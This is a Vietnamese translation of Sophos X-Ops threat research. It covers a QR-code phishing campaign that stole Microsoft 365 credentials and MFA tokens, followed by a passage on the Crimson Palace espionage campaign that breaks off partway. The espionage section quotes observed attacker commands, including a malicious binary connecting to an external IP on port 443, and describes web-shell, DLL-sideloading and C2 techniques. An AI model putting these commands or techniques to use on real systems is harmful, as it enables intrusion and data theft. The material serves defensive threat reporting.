Ngày 16 tháng 10 năm 2024

Nghiên cứu mối đe dọa đặc sắc Lừa đảo Mã QR Quishing Sophos X-Ops Thư rác lừa đảo bằng giáo mác x-ops

Các chuyên gia bảo mật luôn cảnh giác với các kỹ thuật đe dọa đang phát triển. Nhóm Sophos X-Ops gần đây đã điều tra các cuộc tấn công lừa đảo nhắm vào một số nhân viên của chúng tôi, một trong số họ đã bị lừa cung cấp thông tin của mình.

Những kẻ tấn công đã sử dụng cái gọi là quishing (một từ ghép của “mã QR” và “lừa đảo”). Mã QR là một cơ chế mã hóa có thể đọc được bằng máy, có thể đóng gói nhiều loại thông tin, từ các dòng văn bản đến dữ liệu nhị phân, nhưng hầu hết mọi người đều biết và nhận ra cách sử dụng phổ biến nhất hiện nay của chúng là một cách nhanh chóng để chia sẻ URL.

Chúng tôi trong ngành an ninh thường dạy mọi người khả năng chống lại lừa đảo bằng cách hướng dẫn họ xem kỹ URL trước khi nhấp vào trên máy tính. Tuy nhiên, không giống như URL ở dạng văn bản thuần túy, mã QR không dễ bị kiểm tra theo cùng một cách.

Ngoài ra, hầu hết mọi người sử dụng camera điện thoại để giải mã QR thay vì máy tính và việc xem xét kỹ lưỡng URL hiển thị trong giây lát trên ứng dụng camera của điện thoại có thể rất khó khăn – một phần vì URL có thể chỉ xuất hiện trong vài giây trước khi ứng dụng ẩn URL khỏi tầm nhìn và một phần vì kẻ tấn công có thể sử dụng nhiều kỹ thuật hoặc dịch vụ chuyển hướng URL khác nhau để che giấu hoặc làm tối nghĩa đích đến cuối cùng của liên kết được hiển thị trên giao diện của ứng dụng camera.

Cuộc tấn công quishing diễn ra như thế nào

Vào tháng 6 năm 2024, các tác nhân đe dọa đã gửi cho nhiều mục tiêu trong Sophos một tài liệu PDF có chứa mã QR dưới dạng tệp đính kèm email. Các email lừa đảo được tạo ra để trông giống như email hợp pháp và được gửi bằng các tài khoản email hợp pháp, bị xâm phạm và không phải của Sophos.

(Để làm rõ, đây không phải là lần đầu tiên chúng tôi thấy email lừa đảo; Nhân viên đã bị nhắm mục tiêu vào một loạt vào tháng 2 và một lần nữa vào tháng 5. Khách hàng đã bị nhắm mục tiêu bởi các chiến dịch tương tự trong ít nhất một năm trở lại đây. X-Ops quyết định tập trung vào các cuộc tấn công nhắm vào Sophos vì chúng tôi được phép điều tra và chia sẻ chúng.)

Dòng tiêu đề của tin nhắn khiến chúng có vẻ như xuất phát từ nội bộ công ty, dưới dạng một tài liệu được gửi qua email trực tiếp từ máy quét kết nối mạng trong văn phòng.

Email lừa đảo ban đầu nhắm vào một nhân viên Sophos có một số điểm không nhất quán và lỗi, bao gồm tên tệp đính kèm không khớp trong nội dung, thiếu văn bản trong chủ đề và nội dung và tên người gửi không khớp với định dạng thông thường của công ty

Một dấu hiệu đáng chú ý là tin nhắn email được cho là xuất phát từ máy quét có tên tệp cho tài liệu trong nội dung tin nhắn, nhưng trong tất cả các tin nhắn chúng tôi nhận được ngày hôm đó, tên tệp này không khớp với tên tệp của tài liệu được đính kèm trong email.

Ngoài ra, một trong những tin nhắn có dòng tiêu đề là “Đã chuyển tiền đến”, mà máy quét văn phòng tự động sẽ không sử dụng, vì đó là cách diễn giải tổng quát hơn về nội dung của tài liệu được quét. Tin nhắn còn lại có dòng tiêu đề là “ Thông tin độc quyền về phúc lợi việc làm và/hoặc kế hoạch nghỉ hưu đính kèm= ” có vẻ như bị cắt ở cuối.

Trong email thứ hai nhắm vào một nhân viên khác, tên tệp đính kèm lại không khớp với tên trong nội dung. Máy quét sẽ tạo dòng chủ đề đó như thế nào?

Tài liệu PDF có logo Sophos, nhưng ngoài ra thì rất đơn giản. Văn bản xuất hiện bên dưới mã QR có nội dung “Tài liệu này sẽ hết hạn sau 24 giờ”. Nó cũng chỉ ra mã QR trỏ đến Docusign, nền tảng chữ ký hợp đồng điện tử. Những đặc điểm này khiến thông điệp có cảm giác cấp bách giả tạo.

Tài liệu quishing gốc được gửi đến một nhân viên của Sophos

Khi mục tiêu quét mã QR bằng điện thoại của họ, mục tiêu được chuyển hướng đến một trang lừa đảo trông giống như hộp thoại đăng nhập Microsoft365, nhưng được kẻ tấn công kiểm soát. URL có một chuỗi truy vấn ở cuối chứa địa chỉ email đầy đủ của mục tiêu, nhưng kỳ lạ thay, địa chỉ email có một chữ cái viết hoa ngẫu nhiên, khác biệt được thêm vào trước địa chỉ.

Mã QR được liên kết đến một tên miền được Cloudflare bảo vệ và chứa địa chỉ email của mục tiêu, được thêm một chữ cái in hoa không mong muốn

Trang này được thiết kế để đánh cắp cả thông tin đăng nhập và phản hồi MFA bằng một kỹ thuật được gọi là Kẻ thù ở giữa (AiTM).

Trang lừa đảo đã lấy được cả mật khẩu đăng nhập và mã thông báo MFA do mục tiêu nhập vào và trông giống hệt hộp thoại đăng nhập Microsoft365 chuẩn

URL được sử dụng trong cuộc tấn công không được Sophos biết đến vào thời điểm email đến. Trong mọi trường hợp, điện thoại di động của mục tiêu không được cài đặt tính năng nào có thể lọc lượt truy cập vào một trang web độc hại đã biết, chứ đừng nói đến trang web này, vốn không có lịch sử uy tín nào liên quan đến trang web này vào thời điểm đó.

Cuộc tấn công đã xâm phạm thành công thông tin xác thực của nhân viên và mã thông báo MFA thông qua phương pháp này. Sau đó, kẻ tấn công đã cố gắng sử dụng thông tin này để truy cập vào ứng dụng nội bộ bằng cách chuyển tiếp thành công mã thông báo MFA bị đánh cắp gần như theo thời gian thực, đây là một cách mới để lách yêu cầu MFA mà chúng tôi thực thi.

Các biện pháp kiểm soát nội bộ đối với các khía cạnh khác về cách thức hoạt động của quy trình đăng nhập mạng đã ngăn chặn kẻ tấn công truy cập vào bất kỳ thông tin hoặc tài sản nội bộ nào.

Như chúng tôi đã đề cập trước đó, loại tấn công này đang trở nên phổ biến hơn trong số khách hàng của chúng tôi. Mỗi ngày, chúng tôi nhận được nhiều mẫu PDF quishing mới nhắm vào các nhân viên cụ thể tại các tổ chức.

Một tệp PDF bị đánh cắp nhận được vào tuần trước khi xuất bản bài viết này, nhắm vào một khách hàng của Sophos, có vẻ như là một liên kết đến sổ tay nhân viên và bao gồm tên doanh nghiệp, thương hiệu của khách hàng, tên và địa chỉ email của mục tiêu.

Quishing như một dịch vụ

Các mục tiêu nhận được email do một tác nhân đe dọa gửi đi rất giống với các tin nhắn tương tự được gửi bằng nền tảng dịch vụ lừa đảo (PhaaS) có tên là ONNX Store , mà một số nhà nghiên cứu khẳng định là phiên bản đổi tên của bộ công cụ lừa đảo Caffeine . ONNX Store cung cấp các công cụ và cơ sở hạ tầng để chạy các chiến dịch lừa đảo và có thể truy cập thông qua bot Telegram.

Cửa hàng ONNX tận dụng các tính năng CAPTCHA chống bot và proxy địa chỉ IP của Cloudflare để gây khó khăn hơn cho các nhà nghiên cứu trong việc xác định các trang web độc hại, làm giảm hiệu quả của các công cụ quét tự động và làm lu mờ nhà cung cấp dịch vụ lưu trữ cơ bản.

Cửa hàng ONNX cũng sử dụng mã JavaScript được mã hóa có khả năng tự giải mã trong quá trình tải trang web, cung cấp thêm một lớp bảo mật để chống lại các trình quét chống lừa đảo.

Đánh bại mối đe dọa đang gia tăng

Những kẻ tấn công thực hiện các cuộc tấn công lừa đảo sử dụng mã QR có thể muốn bỏ qua các loại tính năng bảo vệ mạng trong phần mềm bảo mật điểm cuối có thể chạy trên máy tính. Một nạn nhân tiềm năng có thể nhận được tin nhắn lừa đảo trên máy tính, nhưng có nhiều khả năng sẽ truy cập trang lừa đảo trên điện thoại ít được bảo vệ của họ.

Vì mã QR thường được quét bằng thiết bị di động thứ cấp nên các URL mà mọi người truy cập có thể vượt qua các biện pháp phòng vệ truyền thống, chẳng hạn như chặn URL trên máy tính để bàn hoặc máy tính xách tay có cài đặt phần mềm bảo vệ điểm cuối hoặc kết nối thông qua tường lửa chặn các địa chỉ web độc hại đã biết.

Chúng tôi đã dành khá nhiều thời gian để nghiên cứu bộ sưu tập mẫu thư rác của mình để tìm ra các ví dụ khác về các cuộc tấn công quishing. Chúng tôi thấy rằng khối lượng các cuộc tấn công nhắm vào vectơ đe dọa cụ thể này dường như đang tăng lên cả về khối lượng và mức độ tinh vi của giao diện tài liệu PDF.

Bộ tệp đính kèm ban đầu vào tháng 6 là các tài liệu khá đơn giản, chỉ có một logo ở trên cùng, một mã QR và một ít văn bản nhằm tạo cảm giác cấp bách để truy cập vào URL được mã hóa trong khối mã QR.

Tuy nhiên, trong suốt mùa hè, các mẫu đã trở nên tinh tế hơn, với sự nhấn mạnh hơn vào thiết kế đồ họa và giao diện của nội dung hiển thị trong PDF. Các tài liệu Quishing hiện trông tinh tế hơn so với những gì chúng ta thấy ban đầu, với văn bản tiêu đề và chân trang được tùy chỉnh để nhúng tên của cá nhân mục tiêu (hoặc ít nhất là theo tên người dùng cho tài khoản email của họ) và/hoặc tổ chức mục tiêu nơi họ làm việc bên trong PDF.

Một trong những tài liệu quishing trông chuyên nghiệp hơn

Mã QR cực kỳ linh hoạt và một phần thông số kỹ thuật của mã QR có nghĩa là có thể nhúng đồ họa vào giữa khối mã QR.

Một số mã QR trong các tài liệu giả mạo gần đây đã lạm dụng thương hiệu Docusign như một thành phần đồ họa trong khối mã QR, gian lận bằng cách sử dụng uy tín của công ty đó để lừa đảo người dùng.

Để rõ ràng, Docusign không gửi email liên kết mã QR cho khách hàng hoặc khách hàng đang ký tài liệu. Theo sách trắng Chống lừa đảo của DocuSign (PDF), thương hiệu của công ty bị lạm dụng thường xuyên đến mức công ty đã thiết lập các biện pháp bảo mật trong email thông báo của mình .

Một tệp PDF giả mạo có tên người dùng email của mục tiêu được nhúng vào tài liệu, cũng như tên công ty nơi họ làm việc và địa chỉ email đầy đủ của họ trong phần văn bản chân trang và logo DocuSign ở giữa mã QR

Để rõ ràng, sự hiện diện của logo này bên trong mã QR không thể truyền tải bất kỳ tính hợp pháp nào cho liên kết mà nó trỏ đến và không nên mang lại cho nó bất kỳ độ tin cậy nào. Nó chỉ là một tính năng thiết kế của thông số kỹ thuật mã QR, rằng đồ họa có thể xuất hiện ở giữa chúng.

Định dạng của liên kết mà mã QR trỏ đến cũng đã phát triển. Trong khi nhiều URL dường như trỏ đến các tên miền thông thường đang được sử dụng cho mục đích xấu, kẻ tấn công cũng đang tận dụng nhiều kỹ thuật chuyển hướng khác nhau để che giấu URL đích.

Một nhân viên của Sophos đã nhận được tệp PDF này vào tháng 9 năm 2024. Tệp PDF này tham chiếu đến địa chỉ email của họ và ghi “Đây là thông báo dịch vụ bắt buộc” ở đầu và sử dụng ngữ pháp kỳ lạ ở những nơi khác

Ví dụ, một email lừa đảo được gửi đến một nhân viên Sophos khác trong tháng qua đã liên kết đến một liên kết Google được định dạng khéo léo, khi nhấp vào, sẽ chuyển hướng khách truy cập đến trang web lừa đảo. Thực hiện tra cứu URL trong trường hợp này sẽ dẫn đến trang web được liên kết trực tiếp từ mã QR (google.com) được phân loại là an toàn. Chúng tôi cũng đã thấy các liên kết trỏ đến các dịch vụ liên kết ngắn được sử dụng bởi nhiều trang web hợp pháp khác.

Mã QR trỏ đến một URL của Google quá dài để có thể xem toàn bộ từ trong ứng dụng camera trên điện thoại và sẽ chuyển hướng người dùng đến trang web lừa đảo nếu mở

Bất kỳ giải pháp nào có mục đích chặn và dừng việc tải các trang web lừa đảo đều phải giải quyết được bài toán theo dõi chuỗi chuyển hướng đến đích cuối cùng, sau đó thực hiện kiểm tra uy tín của trang web đó, cùng với việc giải quyết thêm sự phức tạp của những kẻ lừa đảo và kẻ lừa đảo ẩn trang web của chúng đằng sau các dịch vụ như CloudFlare.

Email lừa đảo gần đây nhất được gửi tới một nhân viên của Sophos có tệp đính kèm PDF với nội dung khá mỉa mai – nó có vẻ như được gửi bởi một công ty có hoạt động kinh doanh chính là đào tạo và dịch vụ chống lừa đảo.

Tệp PDF đính kèm trong email lừa đảo gần đây nhắm vào Sophos có thông tin chân trang dường như bắt chước các thông báo pháp lý từ một công ty có tên là Egress, một công ty con của công ty đào tạo chống lừa đảo KnowBe4. Tuy nhiên, tên miền mà mã QR trỏ đến thuộc về một công ty tư vấn của Brazil không liên quan gì đến KnowBe4. Có vẻ như trang web của các nhà tư vấn đã bị xâm phạm và được sử dụng để lưu trữ một trang lừa đảo.

Một tài liệu lừa đảo sử dụng ngôn ngữ pháp lý ngụ ý rằng nó xuất phát từ một công ty đào tạo chống lừa đảo và được “Hỗ trợ bởi Sophos(c)”

Tin nhắn đó cũng chứa nội dung chính khiến nó có vẻ như là một tin nhắn tự động, mặc dù có một số lỗi chính tả và lỗi rất kỳ lạ. Giống như các tin nhắn trước, nội dung chính chỉ ra tên tệp cho tệp đính kèm không khớp với tên tệp đính kèm trong email.

Email sau đó có nội dung “mọi thắc mắc xin gửi đến người liên hệ Wayne Center của bạn”, có lẽ là Batman

Chiến thuật MITRE ATT&CK được quan sát

Khuyến nghị và hướng dẫn cho quản trị viên CNTT

Nếu bạn đang phải đối phó với một cuộc tấn công lừa đảo sử dụng mã QR tương tự trong môi trường doanh nghiệp, chúng tôi có một số gợi ý về cách đối phó với các loại tấn công này.

• Nội dung tập trung vào HR, bảng lương hoặc phúc lợi : Hầu hết các email lừa đảo nhắm vào Sophos đều sử dụng giấy tờ của nhân viên như một mánh khóe kỹ thuật xã hội. Các tin nhắn có dòng tiêu đề chứa các cụm từ như “kế hoạch tài chính năm 2024”, “quyền lợi mở đăng ký”, “chi trả cổ tức”, “thông báo thuế” hoặc “thỏa thuận hợp đồng”. Tuy nhiên, không có tin nhắn nào đến từ địa chỉ email của Sophos. Hãy đặc biệt chú ý đến các tin nhắn có nội dung tương tự và đảm bảo rằng tất cả các tin nhắn hợp pháp liên quan đến các chủ đề này đều đến từ một địa chỉ email nội bộ trong tổ chức của bạn, thay vì dựa vào các công cụ nhắn tin của bên thứ ba.
• Mobile Intercept X: Intercept X dành cho thiết bị di động ( Android / iOS ) bao gồm Secure QR Code Scanner, có sẵn thông qua menu hamburger ở góc trên bên trái của ứng dụng. Secure QR Code Scanner bảo vệ người dùng bằng cách kiểm tra các liên kết mã QR với cơ sở dữ liệu về các mối đe dọa đã biết và cảnh báo bạn nếu dịch vụ danh tiếng URL của Sophos biết một trang web là độc hại. Tuy nhiên, nó có hạn chế là không theo dõi các liên kết thông qua chuỗi chuyển hướng.

Máy quét mã QR an toàn Intercept X dành cho thiết bị di động phát hiện ra điềm xấu

• Theo dõi cảnh báo đăng nhập rủi ro: Tận dụng Entra ID Protection của Microsoft hoặc công cụ quản lý danh tính cấp doanh nghiệp tương tự để phát hiện và ứng phó với các rủi ro dựa trên danh tính. Các tính năng này giúp xác định hoạt động đăng nhập bất thường có thể chỉ ra lừa đảo hoặc các hoạt động độc hại khác.
• Triển khai Truy cập có điều kiện:  Truy cập có điều kiện trong Microsoft Entra ID cho phép các tổ chức thực thi các biện pháp kiểm soát truy cập cụ thể dựa trên các điều kiện như vị trí người dùng, trạng thái thiết bị và mức độ rủi ro, tăng cường bảo mật bằng cách đảm bảo chỉ những người dùng được ủy quyền mới có thể truy cập tài nguyên. Bất cứ khi nào có thể, các quy trình phòng thủ chuyên sâu tương tự nên được xem xét như một biện pháp dự phòng cho các mã thông báo MFA có khả năng bị xâm phạm.
• Bật ghi nhật ký truy cập hiệu quả: Mặc dù chúng tôi khuyên bạn nên bật tất cả các tính năng ghi nhật ký được Microsoft mô tả ở đây , nhưng chúng tôi đặc biệt khuyên bạn nên bật kiểm tra, đăng nhập, bảo vệ danh tính và nhật ký hoạt động biểu đồ, tất cả đều đóng vai trò quan trọng trong sự cố này.
• Triển khai bộ lọc email nâng cao: Sophos đã phát hành giai đoạn 1 của Central Email QR phish protection , phát hiện mã QR được nhúng trực tiếp vào email. Tuy nhiên, trong sự cố này, mã QR được nhúng trong tệp đính kèm PDF của email, khiến việc phát hiện trở nên khó khăn. Giai đoạn 2 của Central Email QR code protection sẽ bao gồm quét tệp đính kèm để tìm mã QR và dự kiến ​​phát hành trong quý đầu tiên của năm 2025.
• Thu hồi theo yêu cầu : Sophos Central Khách hàng email sử dụng Microsoft365 làm nhà cung cấp dịch vụ email của họ có thể sử dụng tính năng có tên là thu hồi theo yêu cầu để tìm (và xóa) thư rác hoặc thư lừa đảo từ các hộp thư đến khác trong tổ chức của họ tương tự như các thư đã được xác định là độc hại.

• Sự cảnh giác và báo cáo của nhân viên: Việc nâng cao sự cảnh giác và báo cáo kịp thời của nhân viên là rất quan trọng để giải quyết các sự cố lừa đảo. Chúng tôi khuyên bạn nên triển khai các buổi đào tạo thường xuyên để nhận biết các nỗ lực lừa đảo và khuyến khích nhân viên báo cáo ngay lập tức bất kỳ email đáng ngờ nào cho nhóm ứng phó sự cố của họ.
• Thu hồi các phiên người dùng đang hoạt động đáng ngờ:  Có một sổ tay hướng dẫn rõ ràng về cách thức và thời điểm thu hồi các phiên người dùng có thể cho thấy dấu hiệu xâm phạm. Đối với các ứng dụng O365, hướng dẫn này từ Microsoft rất hữu ích.

Hãy đối xử tốt với con người của bạn

Ngay cả trong điều kiện tốt nhất và với lực lượng lao động được đào tạo bài bản như nhân viên tại Sophos, nhiều hình thức lừa đảo trực tuyến vẫn là mối đe dọa dai dẳng và ngày càng nguy hiểm hơn. May mắn thay, với mức độ bảo vệ nhiều lớp phù hợp, giờ đây có thể giảm thiểu ngay cả những thứ có khả năng nghiêm trọng như một cuộc tấn công lừa đảo trực tuyến thành công.

Nhưng cũng quan trọng như các mẹo phòng ngừa kỹ thuật nêu trên là các yếu tố con người của một cuộc tấn công. Việc xây dựng một nền văn hóa và môi trường làm việc nơi nhân viên được trao quyền, khuyến khích và cảm ơn vì đã báo cáo hoạt động đáng ngờ và nơi nhân viên an ninh thông tin có thể nhanh chóng điều tra, có thể tạo ra sự khác biệt giữa một nỗ lực lừa đảo đơn thuần và một vụ vi phạm thành công.

Chiến dịch gián điệp mạng của Trung Quốc tiếp tục nỗ lực trong nhiều tổ chức ở Đông Nam Á, kết hợp các chiến thuật và mở rộng nỗ lực 

Được viết bởi Mark Parsons , Morgan Demboski , Sean Gallagher

Ngày 10 tháng 9 năm 2024

Sau một thời gian ngắn tạm ngừng hoạt động, Sophos X-Ops tiếp tục theo dõi và ứng phó với những gì chúng tôi đánh giá với độ tin cậy cao là một hoạt động gián điệp mạng do nhà nước Trung Quốc chỉ đạo nhắm vào một cơ quan quan trọng trong chính phủ của một quốc gia Đông Nam Á.  

Trong quá trình điều tra hoạt động đó, mà chúng tôi theo dõi là Chiến dịch Crimson Palace, Sophos Managed Detection and Response (MDR) đã tìm thấy dữ liệu đo từ xa cho thấy sự xâm phạm của các tổ chức chính phủ khác trong khu vực và đã phát hiện ra hoạt động liên quan từ các cụm đe dọa hiện có này trong các tổ chức khác trong cùng khu vực. Những kẻ tấn công liên tục sử dụng các mạng lưới dịch vụ công và tổ chức bị xâm phạm khác trong khu vực đó để phân phối phần mềm độc hại và các công cụ dưới vỏ bọc là điểm truy cập đáng tin cậy. 

Báo cáo trước đây của chúng tôi đề cập đến hoạt động từ ba cụm hoạt động đe dọa an ninh liên quan (STAC) có liên quan đến hoạt động gián điệp mạng: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870) và Cluster Charlie (STAC1305), tất cả đều được phát hiện trong khoảng thời gian từ tháng 3 đến tháng 8 năm 2023. Cả ba cụm đe dọa hoạt động bên trong cơ quan mục tiêu đều ngừng hoạt động vào tháng 8 năm 2023. 

Tuy nhiên, Cluster Charlie đã tiếp tục hoạt động sau đó vài tuần. Hoạt động này, bao gồm một keylogger chưa được ghi chép trước đó mà chúng tôi đặt tên là “TattleTale”, đánh dấu sự khởi đầu của giai đoạn thứ hai và mở rộng hoạt động xâm nhập trên toàn khu vực, vẫn đang tiếp diễn.  

Sophos MDR cũng quan sát thấy một loạt các phát hiện phù hợp với công cụ được Cluster Bravo sử dụng tại các thực thể bên ngoài cơ quan chính phủ được đề cập trong báo cáo ban đầu của chúng tôi, bao gồm hai tổ chức dịch vụ công phi chính phủ và nhiều tổ chức khác, tất cả đều có trụ sở tại cùng một khu vực. Các phát hiện đó bao gồm phép đo từ xa cho thấy việc sử dụng hệ thống của một tổ chức làm điểm chuyển tiếp C2 và là nơi tập trung các công cụ, cũng như việc tập trung phần mềm độc hại trên máy chủ Microsoft Exchange bị xâm phạm của một tổ chức khác.   

Cluster Bravo, mở rộng 

Trong khi Cluster Bravo chỉ hoạt động trong thời gian ngắn trên mạng của tổ chức được đề cập trong báo cáo đầu tiên của chúng tôi, Sophos X-Ops sau đó đã phát hiện hoạt động liên quan đến Cluster Bravo trên mạng của ít nhất 11 tổ chức và cơ quan khác trong cùng khu vực. Ngoài ra, Sophos đã xác định được nhiều tổ chức có cơ sở hạ tầng được sử dụng để dàn dựng phần mềm độc hại bao gồm một cơ quan chính phủ. Các tác nhân đe dọa đã chính xác trong cách chúng tận dụng các môi trường bị xâm phạm này để lưu trữ, đảm bảo luôn sử dụng một tổ chức bị nhiễm trong cùng một ngành dọc cho các cuộc tấn công của chúng. 

Hoạt động mới này kéo dài từ tháng 1 đến tháng 6 năm 2024 và bao gồm hai tổ chức tư nhân có vai trò liên quan đến chính phủ. Các tổ chức bị ảnh hưởng đại diện cho một loạt các chức năng quan trọng của chính phủ mục tiêu. 

Cluster Charlie, đổi mới 

Cluster Charlie đã im lặng vào tháng 8 năm 2023 sau khi Sophos chặn các cấy ghép C2 tùy chỉnh (PocoProxy) . Tuy nhiên, những kẻ đứng sau vụ xâm nhập cuối cùng đã quay trở lại với các kỹ thuật mới vào cuối tháng 9.  

Điều này bắt đầu bằng những nỗ lực trốn tránh các khối bằng cách chuyển sang các kênh C2 khác nhau và với việc diễn viên Cluster Charlie thay đổi cách triển khai các bản cấy ghép. Những thay đổi này bao gồm, như chúng tôi đã lưu ý trong báo cáo trước, sử dụng trình tải phần mềm độc hại tùy chỉnh có tên là HUI loader (do Sentinel Labs xác định) để đưa một đèn hiệu Cobalt Strike vào tiện ích Máy tính từ xa mstsc.exe.  

Tuy nhiên, vào tháng 9, những kẻ tấn công đứng sau Cluster Charlie đã thay đổi hoạt động của chúng theo nhiều cách: 

• Họ sử dụng các công cụ mã nguồn mở và có sẵn để thiết lập lại sự hiện diện của mình sau khi Sophos phát hiện và chặn các công cụ tùy chỉnh của họ. 
• Họ đã tận dụng nhiều công cụ và kỹ thuật vốn là một phần của các nhóm hoạt động đe dọa khác mà chúng tôi đã quan sát.   

Việc rò rỉ dữ liệu có giá trị tình báo vẫn là mục tiêu sau khi hoạt động trở lại. Tuy nhiên, phần lớn nỗ lực của họ dường như tập trung vào việc thiết lập lại và mở rộng chỗ đứng của họ trên mạng mục tiêu bằng cách bỏ qua phần mềm EDR và ​​nhanh chóng thiết lập lại quyền truy cập khi các thiết bị cấy ghép C2 của họ đã bị chặn.  

Từ tháng 9 năm 2023 trở đi: Web shell và các công cụ nguồn mở 

Với các công cụ C2 của họ bị Sophos chặn, những kẻ tấn công đã áp dụng một cách tiếp cận mới. Sử dụng thông tin xác thực đã đánh cắp trước đó, những kẻ tấn công đã triển khai một web shell tới một máy chủ ứng dụng web bằng tính năng tải tệp tích hợp của nó. Kẻ tấn công đã thực hiện một cuộc điều tra có phương pháp về tệp cấu hình của máy chủ ứng dụng web và các thư mục ảo để xác định vị trí DLL của ứng dụng web. Sau đó, chúng sử dụng web shell để thực thi các lệnh trên máy chủ ứng dụng web mục tiêu. Điều này bao gồm sao chép thư viện liên kết động (DLL) của ứng dụng vào một thư mục tài liệu web và ngụy trang nó thành PDF để cho phép nó được truy xuất thông qua ứng dụng, sử dụng thông tin xác thực trước đó được liên kết với hoạt động của Cluster Charlie.    

Mọi hoạt động trinh sát và thu thập này diễn ra trong một khoảng thời gian cực kỳ ngắn—dưới 45 phút. 

Họ đã quay lại máy chủ ứng dụng web bị xâm phạm vào tháng 11, sử dụng web shell để triển khai khung Havoc C2 nguồn mở nhằm hỗ trợ hoạt động do thám. Máy chủ này đã ngoại tuyến ngay sau đó và chúng tôi không thể thu thập thêm dữ liệu từ xa về hoạt động của những kẻ tấn công. Tuy nhiên, Sophos MDR sau đó đã tìm thấy cùng một ứng dụng web bị khai thác trên các máy chủ khác. Trong vài tháng tiếp theo, tác nhân đe dọa Cluster Charlie sẽ thường xuyên triển khai web shell trên các máy chủ khác trên toàn bộ mạng mục tiêu trước khi tải xuống các tải trọng Havoc.  

Ví dụ, vào tháng 11, những kẻ tấn công đã sử dụng công cụ Havoc để đưa mã vào các quy trình khác, sau đó triển khai công cụ SharpHound nguồn mở để lập bản đồ cơ sở hạ tầng Active Directory.  

Hoạt động này cho thấy sự quan tâm liên tục của các tác nhân đằng sau Cluster Charlie trong việc lập bản đồ địa hình cơ sở hạ tầng của môi trường từ nhiều góc nhìn. Vào tháng 6 năm 2023, Cluster Charlie đã thực hiện một lần chụp chuyên sâu các sự kiện đăng nhập thành công của tổ chức mục tiêu (ID sự kiện 4624) thông qua các lệnh PowerShell. Họ tiếp tục thực hiện quét ping các địa chỉ IP được liên kết với vị trí của các lần đăng nhập thành công đó, lập bản đồ người dùng của tổ chức với không gian địa chỉ IP của mạng. Việc sử dụng SharpHound sẽ cung cấp thêm kiến ​​thức về cấu trúc của tổ chức, bao gồm thông tin chi tiết về các quyền trong miền được chỉ định cho những người dùng được lập bản đồ này. 

Chúng tôi tiếp tục thấy những kẻ đe dọa chuyển sang các công cụ nguồn mở khi công cụ của chúng để trốn tránh C2 hoặc MDR đã thất bại trong giai đoạn hoạt động thứ hai này. Các công cụ có sẵn và nguồn mở bao gồm: 

Tháng 10 và tháng 11 năm 2023: Sự giao thoa của các chiến thuật 

Giống như những quan sát trước đây của chúng tôi, những kẻ đứng sau làn sóng hoạt động mới này chủ yếu dựa vào việc tải DLL, sử dụng thư viện liên kết động độc hại với tên hàm trùng khớp với tên hàm được sử dụng bởi các tệp thực thi hợp pháp, đã ký và đặt chúng vào một thư mục nơi chúng sẽ được tìm thấy và tải bởi các tệp thực thi đó. Chúng tôi cũng thấy những kẻ này sử dụng các chiến thuật mà chúng tôi đã quan sát trước đây như một phần của các nhóm hoạt động đe dọa khác, củng cố đánh giá của chúng tôi rằng tất cả các hoạt động trước đó đều được dàn dựng bởi cùng một tổ chức bao quát. 

 Vào tháng 10, Cluster Charlie đã được quan sát thấy triển khai thêm công cụ C2 bằng cách sử dụng DLL hijacking để lạm dụng phần mềm hợp pháp do người điều hành tải xuống để tạo tệp thực thi dễ bị tấn công có thể sử dụng. Những kẻ tấn công đã sử dụng thông tin xác thực thu được từ một thiết bị không được quản lý, sau đó sử dụng thiết bị không được quản lý đó để khởi chạy một cuộc tấn công từ xa vào một hệ thống mục tiêu bằng cách sử dụng mô-đun Impacket atexec—một chiến thuật được sử dụng như một phần của hoạt động Cluster Alpha mà chúng tôi đã quan sát thấy trong hoạt động được đề cập trong báo cáo trước đây của chúng tôi .   

Mô-đun atexec được sử dụng để cấu hình từ xa một tác vụ theo lịch trình trên hệ thống mục tiêu. Tác vụ đó đã thực thi Platinum Watch Dog (ptWatchDog.exe) của Trend Micro với phiên bản độc hại được tải phụ của công cụ DLL tmpblglog.dll; công cụ này được sử dụng để ping một địa chỉ IP do một công ty viễn thông trong nước lưu trữ. Vì atexec được chạy từ một thiết bị không được quản lý, chúng tôi chỉ có thể xác định nó bằng phép đo từ xa và không thể thu thập được mẫu nào. 

 Một tuần sau, Sophos quan sát thấy tác nhân kết nối đến cùng một địa chỉ IP tại công ty viễn thông từ một thiết bị khác trên mạng của nạn nhân, sử dụng kết hợp tải phụ DLL thay thế. Trong trường hợp này, kẻ tấn công triển khai một bản sao của thành phần Windows .NET framework hợp lệ, mscorsvw.exe, nằm trong thư mục C:\Windows\Help\Help để tải phụ tải độc hại (mscorsvc.dll) và tạo kết nối mạng đến cùng một công ty viễn thông trên cổng TCP 443.  

Trong các kết nối mạng này, Sophos đã quan sát thấy việc tạo ra một khóa xác thực máy mới. Điều này cho thấy rằng tác nhân đe dọa đã cố gắng RDP từ một thiết bị bên ngoài môi trường của tổ chức mục tiêu. Việc điều tra IP từ xa thông qua công cụ tìm kiếm lỗ hổng Shodan đã tìm thấy một màn hình xác thực người dùng máy chủ RDP mở trên thiết bị từ xa đó. Những kẻ tấn công liên tục sử dụng các mạng bị xâm phạm khác trong khu vực của tổ chức để di chuyển ngang trong mạng.  

Vào ngày 3 tháng 11, Sophos MDR một lần nữa quan sát thấy các tác nhân sử dụng atexec từ một thiết bị không được quản lý trên mạng để thực thi tệp độc hại (C:\ProgramData\mios.exe) trên một hệ thống mục tiêu để tạo ra các thông tin liên lạc nội bộ và bên ngoài: 

• Truyền thông nội bộ: C:\Windows\system32\cmd.exe /C “c:\programdata\mios.exe 172.xx.xxx.xx 65211” 
• Truyền thông bên ngoài: c:\programdata\mios.exe 178.128.221.202 443 (Digital Ocean, Singapore) 

Sophos không thể lấy được mẫu của tệp thực thi độc hại này.      

Tháng 11 và tháng 12 năm 2023, phần 1: Chiếm đoạt dịch vụ 

Cũng trong tháng 11, chúng tôi đã quan sát thấy tác nhân đe dọa tìm kiếm nhiều dịch vụ mà chúng có thể khai thác để tải DLL, sau đó là chiếm đoạt DLL của các dịch vụ hiện có để thiết lập một cửa hậu tùy chỉnh. Bước đầu tiên của chúng là sử dụng tiện ích Service Control của Microsoft (sc.exe) để thu thập thông tin về các dịch vụ mà chúng có thể sử dụng để lưu trữ DLL độc hại: 

sc query diagtrack  

sc query appmgmt  

sc query AxInstSV  

sc query swprv 

